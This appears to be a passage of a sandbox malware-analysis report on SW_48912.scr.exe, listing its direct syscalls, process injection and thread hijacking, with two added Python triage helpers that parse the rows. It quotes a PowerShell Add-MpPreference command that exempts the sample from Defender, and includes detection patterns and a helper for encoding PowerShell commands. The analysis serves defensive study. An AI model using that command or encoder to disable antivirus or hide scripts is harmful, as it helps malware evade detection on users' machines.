                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
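The 28 direct-syscall rows above, reduced to a triage summary. This is an added example, not code from the report or from Joe Sandbox: it collapses repeated rows into the distinct call sites per syscall, lists which of the usual remote-injection primitives appear among the directly issued calls, and offers a range check for the module (normally ntdll.dll) whose exported stubs a benign caller would go through. The addresses are the report's own; the 0x76F00000 to 0x76F10000 range used in the demonstration is constructed for illustration only, because the loaded-module list that gives ntdll's real bounds is not part of this excerpt.

```python
"""Summary of the 'Direct from' syscall rows above (added example, not part of
the Joe Sandbox report). DIRECT_SYSCALL_ROWS holds the 28 rows the report lists
for kygSlzwdnMXWUy.exe, reduced to syscall name and attributed address."""
import re
from collections import defaultdict

DIRECT_SYSCALL_ROWS = """
NtQueryAttributesFile: Direct from: 0x76F02E6C
NtAllocateVirtualMemory: Direct from: 0x76F048EC
NtQuerySystemInformation: Direct from: 0x76F048CC
NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
NtOpenSection: Direct from: 0x76F02E0C
NtSetInformationThread: Direct from: 0x76EF63F9
NtDeviceIoControlFile: Direct from: 0x76F02AEC
NtAllocateVirtualMemory: Direct from: 0x76F02BEC
NtCreateFile: Direct from: 0x76F02FEC
NtOpenFile: Direct from: 0x76F02DCC
NtQueryInformationToken: Direct from: 0x76F02CAC
NtTerminateThread: Direct from: 0x76F02FCC
NtProtectVirtualMemory: Direct from: 0x76EF7B2E
NtOpenKeyEx: Direct from: 0x76F02B9C
NtProtectVirtualMemory: Direct from: 0x76F02F9C
NtSetInformationProcess: Direct from: 0x76F02C5C
NtNotifyChangeKey: Direct from: 0x76F03C2C
NtCreateMutant: Direct from: 0x76F035CC
NtWriteVirtualMemory: Direct from: 0x76F02E3C
NtMapViewOfSection: Direct from: 0x76F02D1C
NtResumeThread: Direct from: 0x76F036AC
NtAllocateVirtualMemory: Direct from: 0x76F02BFC
NtReadFile: Direct from: 0x76F02ADC
NtQuerySystemInformation: Direct from: 0x76F02DFC
NtDelayExecution: Direct from: 0x76F02DDC
NtQueryInformationProcess: Direct from: 0x76F02C26
NtResumeThread: Direct from: 0x76F02FBC
NtCreateUserProcess: Direct from: 0x76F0371C
"""

ROW_RE = re.compile(r"(?P<name>Nt\w+):\s*Direct from:\s*(?P<addr>0x[0-9A-Fa-f]+)")

# Native calls a remote-injection sequence is built from; which of them the
# sample issues directly is the part of the list worth reading first.
INJECTION_PRIMITIVES = (
    "NtCreateUserProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtProtectVirtualMemory", "NtMapViewOfSection", "NtUnmapViewOfSection",
    "NtQueueApcThread", "NtSetContextThread", "NtResumeThread",
)


def parse_direct_syscalls(text):
    """[(syscall name, attributed address as int), ...] in report order."""
    return [(m.group("name"), int(m.group("addr"), 16)) for m in ROW_RE.finditer(text)]


def sites_by_syscall(records):
    """Distinct call sites per syscall, sorted, so repeated rows collapse."""
    sites = defaultdict(set)
    for name, addr in records:
        sites[name].add(addr)
    return {name: sorted(addrs) for name, addrs in sites.items()}


def multi_site_syscalls(records):
    """Syscalls issued from more than one distinct site."""
    return sorted(n for n, s in sites_by_syscall(records).items() if len(s) > 1)


def injection_primitives_seen(records):
    """The injection primitives that appear among the direct syscalls, in
    INJECTION_PRIMITIVES order."""
    names = {name for name, _ in records}
    return [p for p in INJECTION_PRIMITIVES if p in names]


def sites_outside(records, lo, hi):
    """Attributed addresses not inside [lo, hi). Pass the base and end of the
    module whose stubs a benign caller goes through (normally ntdll.dll), taken
    from the report's loaded-module list; this excerpt does not include it."""
    return sorted({addr for _, addr in records if not lo <= addr < hi})


if __name__ == "__main__":
    recs = parse_direct_syscalls(DIRECT_SYSCALL_ROWS)
    for name, addrs in sorted(sites_by_syscall(recs).items()):
        print(f"{name:32s}", ", ".join(hex(a) for a in addrs))
    print("multiple sites:", multi_site_syscalls(recs))
    print("injection primitives:", injection_primitives_seen(recs))
    # Constructed range, for illustration only; not ntdll's real bounds in this run.
    print("outside 0x76F00000-0x76F10000:", [hex(a) for a in sites_outside(recs, 0x76F00000, 0x76F10000)])
```

On the rows above this yields 23 distinct syscalls from 28 rows; NtAllocateVirtualMemory, NtProtectVirtualMemory, NtQuerySystemInformation and NtResumeThread are each issued from more than one site, and six of the nine listed injection primitives are present (NtQueueApcThread, NtSetContextThread and NtUnmapViewOfSection are not among the direct calls, although the report records an APC queue and a thread-context write elsewhere).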
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Memory written: C:\Users\user\Desktop\SW_48912.scr.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: read write
                Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdchange.exe | Thread register set: target process: 7056
                Source: C:\Windows\SysWOW64\sdchange.exe | Thread APC queued: target process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
                Source: C:\Windows\SysWOW64\sdchange.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
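The injection and process-creation rows above, turned into a triage summary. This is an added example, not code from the report or from Joe Sandbox; the rows it consumes are copied verbatim from the report, and the parser accepts them either as extracted (Source column fused onto the action, trailing "Jump to behavior" link text) or with a "Source | action" separator. It lists parent/child process pairs, executable sections mapped into another process, a PE header written at an image base (4D5A is the "MZ" signature), thread-context and APC events, and the Add-MpPreference exclusion, also when wrapped in a base64 -EncodedCommand; encode_powershell_command is a helper added here for building such inputs, not something the report shows.

```python
"""Triage helper for the injection and process-creation rows above (added example,
not part of the Joe Sandbox report). Rows are consumed as extracted: the Source
column is fused onto the action ("...exeProcess created: ...") and each row ends
in the "Jump to behavior" link text; a "Source | action" separator also works."""
import base64
import re
from collections import defaultdict

# Rows copied verbatim from the report excerpt above.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory written: C:\Users\user\Desktop\SW_48912.scr.exe base: 400000 value starts with: 4D5AJump to behavior",
    r"Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Users\user\Desktop\SW_48912.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 7056Jump to behavior",
    r"Source: C:\Windows\SysWOW64\sdchange.exeThread APC queued: target process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeJump to behavior",
    r'Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior',
    r'Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior',
    r'Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior',
]

ACTIONS = ("Memory written", "Section loaded", "Thread register set", "Thread APC queued", "Process created")
ROW_RE = re.compile(r"^Source:\s*(?P<source>.+?\.exe)\s*\|?\s*(?P<action>" + "|".join(map(re.escape, ACTIONS))
                    + r"):\s*(?P<details>.*?)(?:Jump to behavior)?$")
SECTION_RE = re.compile(r"^NULL target:\s*(?P<target>.+?)\s+protection:\s*(?P<prot>.+)$")
MEMWRITE_RE = re.compile(r"^(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+)$")
PROCESS_RE = re.compile(r'^(?P<image>.+?\.exe)\s+(?P<cmdline>".*)$')
TARGET_RE = re.compile(r"^target process:\s*(?P<target>.+)$")
# Add-MpPreference with any of the exclusion switches; value quoted or bare.
EXCLUSION_RE = re.compile(r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+(?:"(?P<quoted>[^"]+)"|(?P<bare>\S+))',
                          re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def encode_powershell_command(script):
    """UTF-16LE then base64: the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload, if any, so the exclusion
    pattern also catches the base64-wrapped form of the same cmdlet."""
    m = ENCODED_RE.search(cmdline)
    if m:
        try:
            return cmdline + " " + base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass
    return cmdline


def analyze(lines):
    """Group the rows into the findings an analyst reads first."""
    f = {"children": defaultdict(list),  # parent image -> [child image, ...]
         "exec_sections": [],            # (source, target): executable section mapped into target
         "pe_overwrites": [],            # (source, target, base): PE header ("MZ") written at base
         "thread_hijacks": [],           # (source, action, target): thread context set / APC queued
         "defender_exclusions": []}      # (source, excluded value) from Add-MpPreference
    for line in lines:
        row = ROW_RE.match(line.strip())
        if not row:
            continue
        source, action, details = row.group("source", "action", "details")
        if action == "Process created" and (m := PROCESS_RE.match(details)):
            f["children"][source].append(m.group("image"))
            x = EXCLUSION_RE.search(expand_encoded_command(m.group("cmdline")))
            if x:
                f["defender_exclusions"].append((source, x.group("quoted") or x.group("bare")))
        elif action == "Section loaded" and (m := SECTION_RE.match(details)):
            if "execute" in m.group("prot"):
                f["exec_sections"].append((source, m.group("target")))
        elif action == "Memory written" and (m := MEMWRITE_RE.match(details)):
            if m.group("magic").upper().startswith("4D5A"):
                f["pe_overwrites"].append((source, m.group("target"), int(m.group("base"), 16)))
        elif action.startswith("Thread") and (m := TARGET_RE.match(details)):
            f["thread_hijacks"].append((source, action, m.group("target")))
    f["children"] = dict(f["children"])
    return f


def reach(findings, root):
    """Images root reached, transitively, by spawning them or by mapping
    executable memory into them; depth-first, root first."""
    edges = defaultdict(set)
    for src, dst in findings["exec_sections"]:
        edges[src].add(dst)
    for parent, kids in findings["children"].items():
        edges[parent].update(kids)
    seen, order, stack = set(), [], [root]
    while stack:
        node = stack.pop()
        if node not in seen:
            seen.add(node)
            order.append(node)
            stack.extend(sorted(edges[node], reverse=True))
    return order
```

analyze(REPORT_LINES) reports four executable-section mappings (two from SW_48912.scr.exe, two from sdchange.exe), one MZ header written at 0x400000 of the sample's own image, one thread-context write and one queued APC from sdchange.exe, and a single Defender exclusion covering the sample's own path; reach() from the sample's path returns SW_48912.scr.exe, kygSlzwdnMXWUy.exe, sdchange.exe, powershell.exe and firefox.exe as the images it spawned or injected into.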
                Source: kygSlzwdnMXWUy.exe, 00000009.00000002.3539047707.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000000.1963693324.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107539619.0000000001610000.00000002.00000001.00040000.00000000.sdmp | Binary or memory strings:
                    Shell_TrayWnd
                    Progman
                    Progmanlock
                    }Program Manager
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Queries volume information (VolumeInformation) for:
                    C:\Users\user\Desktop\SW_48912.scr.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    Font files under C:\Windows\Fonts\, in report order (number of repeated queries in parentheses):
                    bahnschrift.ttf (7), calibrii.ttf, calibrili.ttf, calibriz.ttf, cambria.ttc (2), cambriai.ttf, cambriab.ttf, cambriaz.ttf,
                    Candara.ttf, Candarali.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf,
                    constan.ttf, constani.ttf, constanb.ttf, constanz.ttf, corbel.ttf, corbell.ttf, corbeli.ttf, corbelli.ttf, corbelb.ttf, corbelz.ttf,
                    cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf, framd.ttf, FRADM.TTF, FRADMIT.TTF, FRAMDCN.TTF, FRAHV.TTF,
                    Gabriola.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf,
                    LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf, malgunsl.ttf, malgunbd.ttf, himalaya.ttf,
                    msjh.ttc (2), msjhl.ttc (2), msjhbd.ttc, ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf, micross.ttf, taileb.ttf,
                    msyh.ttc (2), msyhl.ttc, msyi.ttf, mingliub.ttc (3), monbaiti.ttf, msgothic.ttc (2), mvboli.ttf, mmrtext.ttf, mmrtextb.ttf,
                    Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
                    segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, seguihis.ttf, simsun.ttc, simsunb.ttf,
                    Sitka.ttc (4), SitkaI.ttc (4), SitkaB.ttc (2), SitkaZ.ttc (3), sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf,
                    timesi.ttf, timesbd.ttf, timesbi.ttf, trebuc.ttf, trebucit.ttf, trebucbd.ttf, trebucbi.ttf,
                    verdana.ttf, verdanai.ttf, verdanab.ttf, verdanaz.ttf, webdings.ttf, wingding.ttf,
                    YuGothR.ttc (2), YuGothM.ttc (2), YuGothL.ttc, YuGothB.ttc, holomdl2.ttf,
                    AGENCYR.TTF, ANTQUAI.TTF, BERNHC.TTF, BOD_I.TTF, BOD_BI.TTF, BOOKOS.TTF, FORTE.TTF, FRABK.TTF, FRABKIT.TTF, FREESCPT.TTF,
                    GARAIT.TTF, GARABD.TTF, GIGI.TTF, GIL_____.TTF, GLSNECB.TTF, GOUDOS.TTF, GOUDOSI.TTF, INFROMAN.TTF, ITCEDSCR.TTF,
                    JUICE___.TTF, KUNSTLER.TTF, LATINWD.TTF, LBRITE.TTF, LBRITED.TTF, LBRITEDI.TTF, LEELAWDB.TTF,
                    LFAX.TTF, LFAXD.TTF, LFAXI.TTF, LFAXDI.TTF, LSANS.TTF, LSANSDI.TTF, LTYPEB.TTF, LTYPEBO.TTF, MAGNETOB.TTF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
